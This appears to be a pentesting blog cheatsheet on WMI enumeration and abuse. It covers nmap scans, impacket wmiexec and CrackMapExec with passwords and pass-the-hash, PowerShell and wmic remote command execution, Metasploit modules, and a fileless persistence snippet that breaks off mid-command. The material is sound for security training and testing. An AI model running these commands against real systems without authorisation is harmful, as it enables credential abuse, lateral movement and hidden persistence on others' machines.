WMI Enumeration Cheatsheet Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535) What is WMI? Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC. Detection nmap -p 135 <ip> nmap -p 135 -sV <ip> nmap -p 135 --script msrpc-enum <ip> impacket — wmiexec.py # Interactive shell python3 wmiexec.py <domain>/<user>:<pass>@<ip> # Single command python3 wmiexec.py <domain>/<user>:<pass>@<ip> "whoami" python3 wmiexec.py <domain>/<user>:<pass>@<ip> "ipconfig /all" # Pass-the-Hash python3 wmiexec.py -hashes :<nthash> <domain>/<user>@<ip> python3 wmiexec.py -hashes <lmhash>:<nthash> <domain>/<user>@<ip> # Without domain (local account) python3 wmiexec.py ./<user>:<pass>@<ip> CrackMapExec crackmapexec wmi <ip> -u <user> -p <pass> crackmapexec wmi <ip> -u <user> -p <pass> -x 'whoami' crackmapexec wmi <ip> -u <user> -H <nthash> crackmapexec wmi 192.168.1.0/24 -u <user> -p <pass> PowerShell WMI (Local & Remote) # Local system queries Get-WmiObject -Class Win32_OperatingSystem Get-WmiObject -Class Win32_ComputerSystem Get-WmiObject -Class Win32_Process Get-WmiObject -Class Win32_UserAccount Get-WmiObject -Class Win32_Group Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" } Get-WmiObject -Class Win32_Product # Installed software (slow) Get-WmiObject -Class Win32_LogicalDisk Get-WmiObject -Class Win32_StartupCommand # Startup items # Modern equivalent (CIM) Get-CimInstance -ClassName Win32_OperatingSystem Get-CimInstance -ClassName Win32_Process # Remote queries $cred = Get-Credential Get-WmiObject -Class Win32_OperatingSystem -ComputerName <ip> -Credential $cred Get-WmiObject -Class Win32_Process -ComputerName <ip> -Credential $cred PowerShell WMI Remote Code Execution # Execute command via WMI (leaves process behind) $cred = Get-Credential Invoke-WmiMethod -Class Win32_Process -Name Create ` -ArgumentList "cmd.exe /c whoami > C:\output.txt" ` -ComputerName <ip> -Credential $cred # Check output Get-WmiObject -Class CIM_DataFile -Filter "Name='C:\output.txt'" ` -ComputerName <ip> -Credential $cred wmic (Legacy CLI — Windows) :: Local wmic os get Caption,Version,BuildNumber wmic process list brief wmic useraccount list brief wmic group list brief wmic service where "State='Running'" list brief wmic product get Name,Version :: Installed software wmic startupinfo list full :: Remote wmic /node:<ip> /user:<user> /password:<pass> os get Caption wmic /node:<ip> /user:<user> /password:<pass> process call create "cmd.exe /c whoami > C:\out.txt" wmic /node:<ip> /user:<user> /password:<pass> useraccount list brief WQL Queries # WQL = WMI Query Language (SQL-like) Get-WmiObject -Query "SELECT * FROM Win32_Process WHERE Name='lsass.exe'" Get-WmiObject -Query "SELECT * FROM Win32_Service WHERE StartMode='Auto' AND State='Stopped'" Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE LocalAccount=True" Metasploit use exploit/windows/smb/psexec # Uses WMI/DCOM under the hood use exploit/windows/local/wmi # Post-exploitation WMI persistence use auxiliary/scanner/winrm/winrm_wql # WQL via WinRM WMI Persistence (Post-Exploitation) # Create permanent WMI event subscription (fileless persistence) $filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{ Name = "PentestFilter" EventNameSpace = "root

2 min · d3vilsec